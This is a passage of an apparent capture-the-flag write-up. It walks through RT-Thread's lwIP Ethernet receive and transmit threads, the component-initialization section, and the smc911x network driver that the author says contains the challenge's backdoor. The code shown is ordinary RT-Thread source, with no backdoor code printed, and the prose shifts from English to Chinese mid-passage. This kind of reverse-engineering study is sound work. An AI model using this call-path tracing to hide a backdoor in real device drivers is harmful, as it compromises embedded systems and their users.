&amp;eth_rx_thread_stack[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_rx_thread_stack),</span><br><span class="line">                            RT_ETHERNETIF_THREAD_PREORITY, <span class="number">16</span>);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line">    result = <span class="built_in">rt_thread_startup</span>(&amp;eth_rx_thread);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* initialize Tx thread */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LWIP_NO_TX_THREAD</span></span><br><span class="line">    <span class="comment">/* initialize mailbox and create Ethernet Tx thread */</span></span><br><span class="line">    result = <span class="built_in">rt_mb_init</span>(&amp;eth_tx_thread_mb, <span class="string">&quot;etxmb&quot;</span>,</span><br><span class="line">                        &amp;eth_tx_thread_mb_pool[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_tx_thread_mb_pool)/<span class="number">4</span>,</span><br><span class="line">                        RT_IPC_FLAG_FIFO);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_init</span>(&amp;eth_tx_thread, <span class="string">&quot;etx&quot;</span>, eth_tx_thread_entry, RT_NULL,</span><br><span class="line">                            &amp;eth_tx_thread_stack[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_tx_thread_stack),</span><br><span class="line">                            RT_ETHERNETIF_THREAD_PREORITY, <span 
class="number">16</span>);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_startup</span>(&amp;eth_tx_thread);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> (<span class="type">int</span>)result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Let's see what the erx thread mainly does:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span 
class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Ethernet Rx Thread */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">eth_rx_thread_entry</span><span class="params">(<span class="type">void</span>* parameter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device</span>* device;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// Try to read a mail from the mailbox; block forever if there is none</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">rt_mb_recv</span>(&amp;eth_rx_thread_mb, (<span class="type">rt_ubase_t</span> *)&amp;device, RT_WAITING_FOREVER) == RT_EOK)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">rt_base_t</span> level;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">pbuf</span> *p;</span><br><span class="line">            ...</span><br><span class="line">            <span class="comment">/* receive all of buffer */</span></span><br><span class="line">            <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(device-&gt;eth_rx == RT_NULL) <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">                <span class="comment">// Call the registered eth_rx function to receive data from the device</span></span><br><span class="line">                p = device-&gt;<span 
class="built_in">eth_rx</span>(&amp;(device-&gt;parent));</span><br><span class="line">                <span class="keyword">if</span> (p != RT_NULL)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* notify to upper layer */</span></span><br><span class="line">                    <span class="comment">// Hand the received data to the TCPIP thread here</span></span><br><span class="line">                    <span class="keyword">if</span>( device-&gt;netif-&gt;<span class="built_in">input</span>(p, device-&gt;netif) != ERR_OK )</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="built_in">LWIP_DEBUGF</span>(NETIF_DEBUG, (<span class="string">&quot;ethernetif_input: Input error\n&quot;</span>));</span><br><span class="line">                        <span class="built_in">pbuf_free</span>(p);</span><br><span class="line">                        p = <span class="literal">NULL</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">LWIP_ASSERT</span>(<span class="string">&quot;Should not happen!\n&quot;</span>,<span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The code shows that this thread loops over the following steps: <strong>read the mailbox -&gt; read data from the device -&gt; hand the data to the TCPIP thread</strong>.</p><p>The other thread, etx, mainly talks to the hardware: it forwards the data that the TCPIP thread sent to it on to the concrete device for transmission and, once the packet has been sent, sends an ack back to the TCPIP thread:</p><figure class="highlight 
cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Ethernet Tx Thread */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">eth_tx_thread_entry</span><span class="params">(<span class="type">void</span>* parameter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_tx_msg</span>* msg;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// Block until a mail arrives</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">rt_mb_recv</span>(&amp;eth_tx_thread_mb, (<span class="type">rt_ubase_t</span> *)&amp;msg, 
RT_WAITING_FOREVER) == RT_EOK)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">eth_device</span>* enetif;</span><br><span class="line"></span><br><span class="line">            <span class="built_in">RT_ASSERT</span>(msg-&gt;netif != RT_NULL);</span><br><span class="line">            <span class="built_in">RT_ASSERT</span>(msg-&gt;buf   != RT_NULL);</span><br><span class="line"></span><br><span class="line">            enetif = (<span class="keyword">struct</span> eth_device*)msg-&gt;netif-&gt;state;</span><br><span class="line">            <span class="keyword">if</span> (enetif != RT_NULL)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">/* call driver&#x27;s interface */</span></span><br><span class="line">                <span class="comment">// Try to send the packet</span></span><br><span class="line">                <span class="keyword">if</span> (enetif-&gt;<span class="built_in">eth_tx</span>(&amp;(enetif-&gt;parent), msg-&gt;buf) != RT_EOK)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* transmit eth packet failed */</span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* send ACK */</span> <span class="comment">// After sending, send an ACK back to TCPIP</span></span><br><span class="line">            <span class="built_in">rt_completion_done</span>(&amp;msg-&gt;ack);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="c-hw-init">c. 
hw_init</h3><p>That covers how lwIP initializes the etx and erx threads. The actual sending and receiving is done by concrete hardware, so how does that hardware get registered?</p><p>We take the <code>qemu-vexpress-a9</code> board as an example (yes, the one used by the flag challenge).</p><p>Following this call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  This function will call all levels of initialization functions to complete</span></span><br><span class="line"><span class="comment"> *         the initialization of the system, and finally start the scheduler.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">rtthread_startup</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line">    </span><br><span class="line">=&gt; calls =&gt; </span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  
This function will create and start the main thread, but this thread</span></span><br><span class="line"><span class="comment"> *         will not run until the scheduler starts.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">rt_application_init</span>(<span class="type">void</span>);</span><br><span class="line"></span><br><span class="line">=&gt; creates the main thread, whose entry function is =&gt;</span><br><span class="line"> </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  The system main thread. In this thread will call the rt_components_init()</span></span><br><span class="line"><span class="comment"> *         for initialization of RT-Thread Components and call the user&#x27;s programming</span></span><br><span class="line"><span class="comment"> *         entry main().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">main_thread_entry</span>(<span class="type">void</span> *parameter);</span><br><span class="line"></span><br><span class="line">=&gt; calls =&gt; </span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  RT-Thread Components Initialization.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">rt_components_init</span>(<span class="type">void</span>);</span><br></pre></td></tr></table></figure><p>We can find the implementation of <code>rt_components_init</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  RT-Thread Components Initialization.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">rt_components_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> RT_DEBUG_INIT</span></span><br><span class="line">    [...]</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    <span class="keyword">volatile</span> <span class="type">const</span> <span class="type">init_fn_t</span> *fn_ptr;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (fn_ptr = &amp;__rt_init_rti_board_end; fn_ptr &lt; &amp;__rt_init_rti_end; fn_ptr ++)</span><br><span class="line">    &#123;</span><br><span class="line">        (*fn_ptr)();</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span> <span class="comment">/* RT_DEBUG_INIT */</span></span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Doesn't this look a lot like the place we reached earlier when following cross-references upward from backdoor in the IDA decompilation?</p></blockquote><p>As we can see, the function walks every function pointer in the range <code>__rt_init_rti_board_end -&gt; __rt_init_rti_end</code> and calls it. What do these two function pointers stand for? Let's read the relevant code and comments:</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Components Initialization will initialize some driver and components as following</span></span><br><span class="line"><span class="comment"> * order:</span></span><br><span class="line"><span class="comment"> * rti_start         --&gt; 0</span></span><br><span class="line"><span class="comment"> * BOARD_EXPORT      --&gt; 1</span></span><br><span class="line"><span class="comment"> * rti_board_end     --&gt; 1.end</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * DEVICE_EXPORT     --&gt; 2</span></span><br><span class="line"><span class="comment"> * COMPONENT_EXPORT  --&gt; 3</span></span><br><span class="line"><span class="comment"> * FS_EXPORT         --&gt; 
4</span></span><br><span class="line"><span class="comment"> * ENV_EXPORT        --&gt; 5</span></span><br><span class="line"><span class="comment"> * APP_EXPORT        --&gt; 6</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * rti_end           --&gt; 6.end</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * These automatically initialization, the driver or component initial function must</span></span><br><span class="line"><span class="comment"> * be defined with:</span></span><br><span class="line"><span class="comment"> * INIT_BOARD_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * INIT_DEVICE_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> * INIT_APP_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * etc.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_start</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_start, <span class="string">&quot;0&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_board_start</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_board_start, <span class="string">&quot;0.end&quot;</span>);</span><br><span 
class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_board_end</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_board_end, <span class="string">&quot;1.end&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_end</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_end, <span class="string">&quot;6.end&quot;</span>);</span><br></pre></td></tr></table></figure><p>And this macro definition:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> INIT_EXPORT(fn, level)                                                       \</span></span><br><span class="line"><span class="meta">            RT_USED const init_fn_t __rt_init_##fn RT_SECTION(<span class="string">&quot;.rti_fn.&quot;</span> level) = fn</span></span><br></pre></td></tr></table></figure><p>We can conclude that the compiled binary contains a data section named <code>.rti_fn</code>. It holds function pointers used to initialize devices and other components, and the two function pointers mentioned above are <strong>two marker entries registered in this section that delimit where function pointers of a given level are located</strong>.</p><p>From this we can see that a device declared with the <code>INIT_APP_EXPORT</code> macro also has its function pointer placed in the range <strong>__rt_init_rti_board_end -&gt; __rt_init_rti_end</strong>.</p><blockquote><p>In other words, the initialization function of a device declared with INIT_APP_EXPORT is executed in <code>rt_components_init</code>.</p></blockquote><h3 id="d-smc911-init">d. 
smc911_init</h3><p>Next, let's look at the <code>smc911x</code> device driver, which is the driver containing the backdoor (<code>bsp\qemu-vexpress-a9\drivers\drv_smc911x.c</code>).</p><p>The file contains this statement:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">INIT_APP_EXPORT</span>(smc911x_emac_hw_init);</span><br></pre></td></tr></table></figure><p>That is, the smc911x device registers its initialization function <code>smc911x_emac_hw_init</code> in the <code>.rti_fn</code> section, where it waits to be called by <code>rt_components_init</code>.<br>The source of <code>smc911x_emac_hw_init</code> is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">smc911x_emac_hw_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    _emac.iobase = VEXPRESS_ETH_BASE;</span><br><span class="line">    <span class="comment">// 
设置中断号</span></span><br><span class="line">    _emac.irqno  = IRQ_VEXPRESS_A9_ETH;</span><br><span class="line">    ...</span><br><span class="line">    <span class="comment">/* set INT CFG */</span></span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(&amp;_emac, LAN9118_IRQ_CFG, LAN9118_IRQ_CFG_IRQ_POL | LAN9118_IRQ_CFG_IRQ_TYPE);</span><br><span class="line">    ...</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> RT_USING_DEVICE_OPS</span></span><br><span class="line">    _emac.parent.parent.ops        = &amp;smc911x_emac_ops;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    _emac.parent.parent.init       = smc911x_emac_init;</span><br><span class="line">    _emac.parent.parent.open       = RT_NULL;</span><br><span class="line">    _emac.parent.parent.close      = RT_NULL;</span><br><span class="line">    _emac.parent.parent.read       = RT_NULL;</span><br><span class="line">    _emac.parent.parent.write      = RT_NULL;</span><br><span class="line">    _emac.parent.parent.control    = smc911x_emac_control;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    _emac.parent.parent.user_data  = RT_NULL;</span><br><span class="line">    <span class="comment">// 注意! 
这里设置了 eth_rx 和 eth_tx 方法</span></span><br><span class="line">    _emac.parent.eth_rx     = smc911x_emac_rx;</span><br><span class="line">    _emac.parent.eth_tx     = smc911x_emac_tx;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* register ETH device */</span></span><br><span class="line">    <span class="comment">// 对 eth device 进行初始化</span></span><br><span class="line">    <span class="built_in">eth_device_init</span>(&amp;(_emac.parent), <span class="string">&quot;e0&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数主要设置了一些操作（ops），例如 <code>smc911x_emac_init</code>、<code>smc911x_emac_rx</code>、<code>smc911x_emac_tx</code>。我们可以看到该函数为结构体 <code>_emac</code> 设置了 <code>eth_rx</code> 和 <code>eth_tx</code> 字段，因此当 lwIP 线程需要收发信息时，会调用该设备的 <code>smc911x_emac_rx</code>、<code>smc911x_emac_tx</code> 这两个函数。</p><p>这里比较有意思的是结构体 <code>_emac</code> 的类继承关系：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">/* inherit from Ethernet device */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device</span> parent;</span><br><span class="line">    <span class="comment">/* interface address info. 
*/</span></span><br><span class="line">    <span class="type">rt_uint8_t</span> enetaddr[MAX_ADDR_LEN];         <span class="comment">/* MAC address  */</span></span><br><span class="line"></span><br><span class="line">    <span class="type">uint32_t</span> iobase;</span><br><span class="line">    <span class="type">uint32_t</span> irqno;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>这里存在一个 parent 结构体，类似于 C++ 中的继承，表示了一个具体的以太网设备。而该 <code>eth_device</code> 结构体源码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">eth_device</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">/* inherit from rt_device */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">rt_device</span> parent;</span><br><span 
class="line"></span><br><span class="line">    <span class="comment">/* network interface for lwip */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">netif</span> *netif;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">rt_semaphore</span> tx_ack;</span><br><span class="line"></span><br><span class="line">    <span class="type">rt_uint16_t</span> flags;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  link_changed;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  link_status;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  rx_notice;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* eth device interface */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pbuf</span>* (*eth_rx)(<span class="type">rt_device_t</span> dev);</span><br><span class="line">    <span class="built_in">rt_err_t</span> (*eth_tx)(<span class="type">rt_device_t</span> dev, <span class="keyword">struct</span> pbuf* p);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> __cplusplus</span></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_ready</span><span class="params">(<span class="keyword">struct</span> eth_device* dev)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_init</span><span class="params">(<span class="keyword">struct</span> eth_device * dev, 
<span class="type">const</span> <span class="type">char</span> *name)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_init_with_flag</span><span class="params">(<span class="keyword">struct</span> eth_device *dev, <span class="type">const</span> <span class="type">char</span> *name, <span class="type">rt_uint16_t</span> flag)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_linkchange</span><span class="params">(<span class="keyword">struct</span> eth_device* dev, <span class="type">rt_bool_t</span> up)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">int</span> <span class="title">eth_system_device_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> __cplusplus</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个结构体描述了一个抽象的以太网设备接口，其中这些函数指针在 lwIP 层会被调用。</p><p>注意到最后 <code>smc911x_emac_hw_init</code> 函数执行了一下 <code>eth_device_init</code> 函数，而该函数最终会调用到 <code>smc911x_emac_init</code> 函数，在其中<strong>注册中断处理例程 smc911x_isr</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">rt_hw_interrupt_install</span>(emac-&gt;irqno, smc911x_isr, emac, <span class="string">&quot;smc911x&quot;</span>);</span><br></pre></td></tr></table></figure><p>当以太网设备有数据发出中断后，中断处理例程 <code>smc911x_isr</code> 被调用，如果数据准备好了，则调用 <code>eth_device_ready</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">smc911x_isr</span><span class="params">(<span class="type">int</span> vector, <span class="type">void</span> *param)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> status;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span> *emac;</span><br><span class="line"></span><br><span class="line">    emac = <span class="built_in">SMC911X_EMAC_DEVICE</span>(param);</span><br><span class="line"></span><br><span class="line">    status = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_INT_STS);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (status &amp; LAN9118_INT_STS_RSFL)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">eth_device_ready</span>(&amp;emac-&gt;parent);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(emac, LAN9118_INT_STS, status);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 <code>eth_device_ready</code> 函数会发送邮件给 erx 线程：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_ready</span><span class="params">(<span class="keyword">struct</span> eth_device* dev)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (dev-&gt;netif)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(dev-&gt;rx_notice == RT_FALSE)</span><br><span class="line">        &#123;</span><br><span class="line">            dev-&gt;rx_notice = RT_TRUE;</span><br><span class="line">            <span class="comment">// 发送邮件给 erx 线程</span></span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">rt_mb_send</span>(&amp;eth_rx_thread_mb, (<span 